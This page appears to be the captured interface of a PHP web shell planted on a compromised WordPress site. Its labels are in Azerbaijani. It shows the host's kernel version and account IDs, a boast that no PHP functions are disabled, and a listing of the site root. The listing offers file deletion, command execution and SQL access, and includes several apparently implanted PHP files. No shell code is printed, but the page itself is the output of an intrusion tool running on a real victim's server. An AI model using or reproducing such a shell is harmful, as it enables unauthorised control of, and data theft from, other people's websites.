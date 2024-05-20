 Uname: Linux host.host.new.birminghamtimes.com 3.10.0-1160.102.1.el7.x86_64 #1 SMP Tue Oct 17 15:42:21 UTC 2023 x86_64
User: 1003 (birmingx)
Group: 1006 (birmingx)
Disable functions: yoxdu :)
Safe mode: On[ PHPinfo ]
      ( Reset | Go to )
sFaylSizeTarixOwner/GroupPermissionsActions
[ . ] 20 May 2024, 15:19 1003 0755
[ .. ] 20 May 2024, 15:16 1003 0711
[ .quarantine ] 20 May 2024, 14:58 1003 0755 Zip | Sil
[ .tmb ] 20 May 2024, 14:58 1003 0755 Zip | Sil
[ .well-known ] 20 May 2024, 14:58 1003 0755 Zip | Sil
[ wp-admin ] 20 May 2024, 14:58 1003 0755 Zip | Sil
[ wp-content ] 20 May 2024, 14:58 1003 0755 Zip | Sil
[ wp-includes ] 20 May 2024, 14:58 1003 0755 Zip | Sil
.ftpquota 20 b 19 May 2024, 05:35 1003 0600 Download | Rename | Truncate | Delete
.htaccess 853 b 20 May 2024, 15:19 1003 0644 Download | Rename | Truncate | Delete
.user.ini 585 b 03 Jan 2024, 20:33 1003 0644 Download | Rename | Truncate | Delete
admin.php 77.43 Kb 20 May 2024, 14:58 1003 0644 Download | Rename | Truncate | Delete
error_log 171 b 20 May 2024, 15:05 1003 0644 Download | Rename | Truncate | Delete
googlecee0f30d6875ae85.html 53 b 20 May 2024, 14:58 1003 0644 Download | Rename | Truncate | Delete
htaccess.bak 197 b 20 May 2024, 15:19 1003 0644 Download | Rename | Truncate | Delete
index.php 420 b 20 May 2024, 04:24 1003 0644 Download | Rename | Truncate | Delete
license.txt 19.45 Kb 14 Sep 2023, 20:21 1003 0644 Download | Rename | Truncate | Delete
php.ini 703 b 20 May 2024, 14:58 1003 0644 Download | Rename | Truncate | Delete
readme.html 7.23 Kb 20 May 2024, 14:58 1003 0644 Download | Rename | Truncate | Delete
robots.txt 7.46 Kb 20 May 2024, 14:58 1003 0644 Download | Rename | Truncate | Delete
wp-activate.php 7.04 Kb 14 Sep 2023, 20:21 1003 0644 Download | Rename | Truncate | Delete
wp-blog-header.php 351 b 14 Sep 2023, 20:21 1003 0644 Download | Rename | Truncate | Delete
wp-category.php 2.86 Kb 20 May 2024, 14:58 1003 0644 Download | Rename | Truncate | Delete
wp-comments-post.php 2.27 Kb 20 May 2024, 14:58 1003 0644 Download | Rename | Truncate | Delete
wp-config.php 3.45 Kb 20 May 2024, 14:58 1003 0644 Download | Rename | Truncate | Delete
wp-links-opml.php 2.44 Kb 20 May 2024, 14:58 1003 0644 Download | Rename | Truncate | Delete
wp-links.php 118.99 Kb 20 May 2024, 07:41 1003 0644 Download | Rename | Truncate | Delete
wp-load.php 3.83 Kb 14 Sep 2023, 20:21 1003 0644 Download | Rename | Truncate | Delete
wp-login.php 44.76 Kb 15 Sep 2023, 10:08 1003 0644 Download | Rename | Truncate | Delete
wp-mail.php 8.34 Kb 14 Sep 2023, 20:21 1003 0644 Download | Rename | Truncate | Delete
wp-settings.php 25.00 Kb 20 May 2024, 14:58 1003 0644 Download | Rename | Truncate | Delete
wp-signup.php 33.58 Kb 20 May 2024, 14:58 1003 0644 Download | Rename | Truncate | Delete
wp-trackback.php 4.77 Kb 20 May 2024, 14:58 1003 0644 Download | Rename | Truncate | Delete
xmlrpc.php 3.16 Kb 20 May 2024, 14:58 1003 0644 Download | Rename | Truncate | Delete
Yeni fayl | Yeni papka
Icra edin
SQL